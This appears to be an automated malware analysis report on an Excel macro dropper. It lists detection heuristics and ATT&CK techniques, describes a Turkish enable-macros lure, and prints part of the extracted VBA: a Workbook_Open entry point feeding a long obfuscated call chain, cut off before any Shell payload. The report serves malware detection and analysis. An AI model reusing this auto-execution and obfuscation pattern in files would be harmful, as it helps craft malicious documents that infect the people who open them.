MALICIOUS
228
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is an Excel file containing VBA macros, with a Workbook_Open event that calls a function which ultimately executes a Shell command. The document body displays a fake error message in Turkish, prompting the user to enable macros, which is a common social engineering tactic. The presence of the Shell() call and the Workbook_Open auto-execution strongly suggests the macro is designed to download and execute a second-stage payload.
Heuristics 6
-
ClamAV: Xls.Malware.Valyria-10036513-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-10036513-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16618 bytes |
SHA-256: b3fd247dff2bcf7eddc5e71a7c9c8ebac8c9b63c363cac712efac2d9b690727e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub WoRkbooK_oPen(): Call htehi: End Sub
Private Function htehi()
Call MpMBv
End Function
Private Sub MpMBv()
Call rkuWI
End Sub
Static Function rkuWI() As Object
Call kAkHz
End Function
Static Sub kAkHz()
Call PwScM
End Sub
Static Sub PwScM()
Call urAxZ
End Sub
Static Function urAxZ() As Single
Call ZniSm
End Function
Private Function ZniSm() As Byte
Call EiPnz
End Function
Private Function EiPnz() As Byte
Call xzGYp
End Function
Static Sub xzGYp()
Call cuosC
End Sub
Static Function cuosC() As Currency
Call HpWNP
End Function
Static Sub HpWNP()
Call nlEic
End Sub
Static Function nlEic() As Double
Call gBuTT
End Function
Private Sub gBuTT()
Call Lxcog
End Sub
Private Function Lxcog() As Variant
Call qsKJt
End Function
Private Sub qsKJt()
Call VnseG
End Sub
Static Function VnseG() As Integer
Call AjayT
End Function
Static Sub AjayT()
Call tzQkK
End Sub
Static Function tzQkK()
Call YvyEX
End Function
Static Function YvyEX()
Call DqgZk
End Function
Private Function DqgZk() As Date
Call ilOux
End Function
Private Sub ilOux()
Call NhvPK
End Sub
Static Function NhvPK() As Boolean
Call GxmAA
End Function
Static Function GxmAA() As Boolean
Call ltUVN
End Function
Static Sub ltUVN()
Call QoCqa
End Sub
Static Function QoCqa() As Byte
Call vjkKn
End Function
Private Sub vjkKn()
Call oAave
End Sub
Private Function oAave() As Long
Call TvIQr
End Function
Static Sub TvIQr()
Call zrqlE
End Sub
Static Function zrqlE() As String
Call emYGR
End Function
Static Sub emYGR()
Call JhFbe
End Sub
Static Function JhFbe() As String
Call CywMV
End Function
Private Sub CywMV()
Call newHn
End Sub
Function newHn() As Currency
Call RhuOl
End Function
Function RhuOl() As Boolean
Call vlsVj
End Function
Function vlsVj() As Single
Call Yoqdh
End Function
Function Yoqdh() As Integer
Call Crokf
End Function
Function Crokf() As String
Call gvnse
End Function
Static Sub gvnse()
Call wdcjy
End Sub
Static Sub wdcjy()
Call agaqw
End Sub
Static Sub agaqw()
Call EjYyu
End Sub
Static Function EjYyu() As Single
Call hnWFs
End Function
Static Function hnWFs()
Call LqUNr
End Function
Static Function LqUNr() As String
Call ptTUp
End Function
Static Function ptTUp() As Double
Call FbILJ
End Function
Static Function FbILJ() As Byte
Call jfGSH
End Function
Static Function jfGSH() As Single
Call MiEaF
End Function
Sub MiEaF()
Call qlChD
End Sub
Sub qlChD()
Call UpApC
End Sub
Sub UpApC()
Call ysywA
End Sub
Sub ysywA()
Call cvxEy
End Sub
Sub cvxEy()
Call sdmvS
End Sub
Sub sdmvS()
Call VhkCQ
End Sub
Function VhkCQ() As Variant
Call zkiKP
End Function
Function zkiKP() As Long
Call dngRN
End Function
Function dngRN() As Currency
Call HreYL
End Function
Function HreYL() As Date
Call ludgJ
End Function
Function ludgJ() As Object
Call AcSXd
End Function
Function AcSXd() As Integer
Call efQec
End Function
Sub efQec()
Call IjOma
End Sub
Sub IjOma()
Call mmMtY
End Sub
Sub mmMtY()
Call QpKBW
End Sub
Sub QpKBW()
Call ttIIU
End Sub
Sub ttIIU()
Call Jbyzp
End Sub
Sub Jbyzp()
Call wMWbU
End Sub
Static Function wMWbU() As Double
Call sMgnp
End Function
Function sMgnp() As Object
Call nNqyJ
End Function
Static Sub nNqyJ()
Call jOAKe
End Sub
Sub jOAKe()
Call eOKWy
End Sub
Static Function eOKWy() As Integer
Call MuLSp
End Function
Static Function MuLSp() As Byte
Call Iv
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.